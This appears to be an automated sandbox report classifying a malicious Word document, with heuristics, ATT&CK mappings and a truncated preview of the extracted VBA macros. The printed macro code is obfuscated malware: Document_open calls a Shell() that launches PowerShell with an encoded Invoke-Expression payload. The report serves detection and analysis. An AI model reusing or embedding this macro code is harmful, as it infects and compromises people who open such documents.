Verdict: MALICIOUS (Risk Score: 222)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA code, and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' confirms this auto-executes via Document_open. The VBA script, though obfuscated, ultimately calls the Shell function, likely to download and execute a secondary payload. The ClamAV detection further confirms its malicious nature.
Heuristics (6)

- ClamAV: Doc.Malware.Valyria-6992228-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6992228-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16463 bytes |

SHA-256: dd06edeab4a909b5bd98eb6823995d247c65d51ce07f20cd63e3b207c5b15e5f

Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "KminClzMiQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function WZuCNhuthG()
On Error Resume Next
psiNt = 63777 + NGsQr + (67143 * CDbl(WoRaKs) - PFKLD / CSng(21159) - YjoSX / Hex(YIwnj) + 85827 - 58550)
hrSVAa = XCpWho - EzTSX / 26126 / duROiC - 223327908 + Hex(ASzRc) * zwACQw - Round(40570)
NuKtGt = Sqr(85326)
zTnblp = ORwSdO
DzAHVX = 55351 + jrEFt + (50616 * CDbl(zRBZs) - sCvRh / CSng(28786) - msJvw / Hex(wwzuv) + 52236 - 85219)
QHmzmR = uFpnI - kriJG / 66971 / JzXGzA - 223327908 + Hex(rDdai) * nWkWw - Round(22775)
BzRrD = Sqr(25662)
lrWwz = pNZoWi
YSkjzm = 99557 + rbOJG + (39804 * CDbl(GMLvp) - FCRzfP / CSng(864) - mVqJSO / Hex(ApzZt) + 36669 - 23142)
wpfqS = ShTWz - EFYAoF / 19399 / XMVvZ - 223327908 + Hex(jbBTzz) * iZAicw - Round(75888)
qzLPD = Sqr(5801)
lDuFHS = RJQHkU
jkUjQY = 63133 + fAWCFW + (62192 * CDbl(VMJWY) - hSBqm / CSng(42064) - EvqDi / Hex(pjvLX) + 12761 - 80241)
LAWXSC = halKi - FjwWUr / 83813 / BmPjmC - 223327908 + Hex(JNCoQc) * phKjmi - Round(25986)
ijsdkh = Sqr(87501)
IfDuiH = RzXJt
WZuCNhuthG = mBouKHUsso + VBA.Shell(iwQMvkWh + Chr(VEjWrLu + vbKeyP + zvChqOko) + "owers" + SlbwbAtsJAH + QTwDkuG + vAmPdLwawi + pNqrTwQamT + PJYich + fAnBirzwsq, 49604 - 49604)
GofAQ = 46082 + jWSwV + (82122 * CDbl(MlFMN) - AUbld / CSng(71588) - GmwOc / Hex(baWEm) + 27058 - 79903)
uikonu = mMtWf - FzXEW / 91394 / qpjTw - 223327908 + Hex(rzumj) * bnMHN - Round(48288)
BZpCE = Sqr(18179)
lvHAZA = GPpBAK
umEzR = 80984 + COraK + (93557 * CDbl(UtqJi) - QACjWD / CSng(31070) - YvtACR / Hex(BHJwiY) + 54261 - 1253)
GwsukY = OZZiSw - HfWTl / 61849 / vIozF - 223327908 + Hex(Wkldzh) * uEZmR - Round(67851)
iATfMZ = Sqr(26611)
fOoJKP = hSDBlj
End Function
Private Sub Document_open()
On Error Resume Next
iKqEvi = 50947 + dowfl + (93493 * CDbl(DGjCCz) - mJqRGo / CSng(56257) - ckLzXk / Hex(VrmId) + 8793 - 38656)
qlkzX = NdYlbj - LTlZu / 80313 / sQtUaS - 223327908 + Hex(XVDKn) * DtaPX - Round(24753)
SwCip = Sqr(63880)
iJzzhw = snItn
vjZrPY = 8821 + pIUboR + (17275 * CDbl(tWBhJ) - iDWSCL / CSng(28395) - KbboT / Hex(TizzI) + 9631 - 33284)
obBqR = WUzVt - QztAA / 94618 / wKWBZE - 223327908 + Hex(ZKbFw) * pUWzZ - Round(95875)
svNGw = Sqr(48529)
HNNWBX = rwKcj
WZuCNhuthG
JMbtS = 48668 + lFcMtr + (48801 * CDbl(XwbtaC) - PBwTXK / CSng(23050) - RLfsm / Hex(OaDazM) + 93880 - 87979)
VKOza = wBRZsK - OznjI / 42780 / TdqwV - 223327908 + Hex(cJSbq) * lGKhX - Round(4549)
UKEiVD = Sqr(61838)
WzOCi = sAHwv
ImsUPb = 18710 + ojpjk + (49369 * CDbl(DRPiUs) - uzDum / CSng(62406) - zAZda / Hex(USMHai) + 16966 - 32553)
Xsoqr = QVodwr - PFJwZl / 9519 / DpkAE - 223327908 + Hex(AadqU) * zClmm - Round(55011)
qCTJpC = Sqr(88382)
dFYfmD = jGLRBM
End Sub
Attribute VB_Name = "vmlBKZHazJ"
Function SlbwbAtsJAH()
On Error Resume Next
pHpiV = Cwwwq
MibPd = Sqr(39379)
iXHHQC = viwtd - dWsJSd / 9160 / GcFHih - 223327908 + Hex(nVVQho) * jAdQtU - Round(68411)
qQkKNi = 69857 + fTHdAu + (97639 * CDbl(iRSTT) - AhGSwl / CSng(88041) - UdHHk / Hex(wZfMqO) + 53188 - 41923)
ZNwEjOQ = "HeLL &( ([ST" + "ring]$" + "VErbosEPreFEre" + "nce)[1,3]+'" + "X'-jo" + "IN'') ( " + "((120," + " 61 ,31 ,53,4 " + ", 38 , 26 "
rUwWWq = RzzPuY
rDsmv = Sqr(30475)
rwJRrd = HFJEM - QDwuBX / 24045 / aKWsFv - 223327908 + Hex(zJQcA) * BifjmB - Round(25254)
CAlVLH = 25002 + dvKims + (60662 * CDbl(kkCbl) - IHLDCD / CSng(46805) - Stapz / Hex(iXJbRO) + 83437 - 6678)
vaTiGlE = ",124, 97 , 12" + "4,50 , 57,4" + "3 , 113,51,62" + " , 54, 57 ,63 ," + " 40," + " 124" + ",46 , 61 ,5" + "0,56 ,51,49 , 1" + "03,120 ,42,58,1" + "7 ,4"
WHJia = nGwkYD
hSkjO = Sqr(80590)
UCDfMi = KHhKO - MXOHij / 45640 / PBdii - 223327908 + Hex(fvuTSC) * LBtCYK - Round(38192)
RlmYm = 64758 + HwsbMq + (28557 * CDbl(ROPVz) - ECNOi / CSng(512) - sLjEzi / Hex(ttHzTW) + 89228 - 50557)
MTjQUji = "9, " + "30 ,9 ,124" + ",97, 124 " + ", 50 , 57, " + "43 , 11 ... (truncated)
```